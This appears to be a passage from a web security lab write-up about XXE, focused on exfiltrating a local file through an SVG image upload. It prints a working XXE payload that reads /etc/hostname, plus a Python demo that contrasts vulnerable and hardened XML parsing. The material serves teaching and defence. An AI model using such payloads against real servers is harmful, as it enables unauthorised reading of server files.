Exploiting XXE using external entities to retrieve files


Exploiting XXE to perform SSRF attacks


Lab: Exploiting XInclude to retrieve files


Exploiting XXE via image file upload

The upload endpoint accepts SVG, and the server-side image processing parses it as XML with external entities enabled, so a DTD in the SVG can pull a local file into the document. The payload below declares an external entity pointing at /etc/hostname and references it inside a text element, so the file contents end up in the processed image:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
	<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Contents of /etc/hostname read back from the processed image: f7dbe7963014
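To see why the SVG works as a carrier, here is an added example (not from the lab or from PortSwigger) that runs the same payload through Python's xml.sax twice: once with external general entities resolved, which is the behaviour a vulnerable image library has, and once with the default, hardened setting. The file it leaks is a constructed stand-in for /etc/hostname written to a temp directory; the lab's real path and the hostname value are only mirrored for illustration.

```python
"""Added example: the lab's SVG XXE payload parsed with and without
external-entity resolution (xml.sax, Python standard library only)."""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Same structure as the lab payload; only the SYSTEM identifier is templated.
SVG_TEMPLATE = (
    '<?xml version="1.0" standalone="yes"?>\n'
    '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{uri}" > ]>\n'
    '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">\n'
    '\t<text font-size="16" x="0" y="16">&xxe;</text>\n'
    '</svg>\n'
)


def build_svg_xxe(target_uri: str) -> str:
    """Return the SVG payload with the external entity pointing at target_uri."""
    return SVG_TEMPLATE.format(uri=target_uri)


class TextCollector(ContentHandler):
    """Collects character data; an expanded entity arrives here as text,
    exactly where the image renderer would draw it into the <text> element."""

    def __init__(self) -> None:
        super().__init__()
        self.parts = []

    def characters(self, content: str) -> None:
        self.parts.append(content)


def render_text(svg: str, resolve_external_entities: bool) -> str:
    """Parse the SVG and return its text content.

    resolve_external_entities=True re-enables xml.sax's external general
    entity loading (the pre-3.7.1 default), i.e. the vulnerable configuration.
    False is the hardened default: the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg.encode("utf-8")))
    return "".join(handler.parts).strip()


def demo():
    """Write a constructed stand-in for /etc/hostname, then parse the payload
    both ways. Returns (text with entities resolved, text with them disabled)."""
    workdir = Path(tempfile.mkdtemp())
    hostname_file = workdir / "hostname"
    # Constructed sample; the lab's real hostname is only used as the value.
    hostname_file.write_text("f7dbe7963014\n", encoding="utf-8")

    svg = build_svg_xxe(hostname_file.as_uri())  # file:///... like the lab
    leaked = render_text(svg, resolve_external_entities=True)
    safe = render_text(svg, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("external entities resolved :", repr(leaked))
    print("external entities disabled :", repr(safe))
```

The vulnerable run returns the file contents as the document's text, which is what the rendered avatar shows in the lab; the hardened run returns an empty string because the parser never fetches the SYSTEM identifier. Any server-side component that rasterises user-supplied SVG needs the equivalent of that second setting in whatever XML library it wraps.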

Lab: Blind XXE with out-of-band interaction
